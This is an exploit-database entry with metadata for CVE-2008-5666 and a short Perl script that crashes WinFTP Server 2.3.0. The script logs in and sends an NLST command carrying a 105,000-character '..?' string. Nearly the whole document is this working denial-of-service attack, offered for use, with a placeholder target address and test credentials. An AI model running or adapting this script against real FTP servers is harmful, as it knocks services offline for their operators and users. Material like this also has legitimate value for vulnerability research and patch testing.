WinFTP Server 2.3.0 - 'NLST' Denial of Service

Author: Julien Bedard
type: dos
platform: windows
port: 
date_added: 2008-09-25 
date_updated: 2016-12-23 
verified: 1 
codes: OSVDB-49043;CVE-2008-5666 
tags: 
aliases:  
screenshot_url:  
application_url: 

#!/usr/bin/perl
############
#
# Simple Dos Crap for the winftpsrv.exe v.2.3.0
#  by Julien Bedard
#
####################################

use Net::FTP;
$wftpsrvaddr = "255.255.255.255";
$overflow = "..?" x 35000;
$user = "test";
$pass = "test";
$port = 21;

$ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;

$ftp->nlst($overflow);
$ftp->quit;

# milw0rm.com [2008-09-26]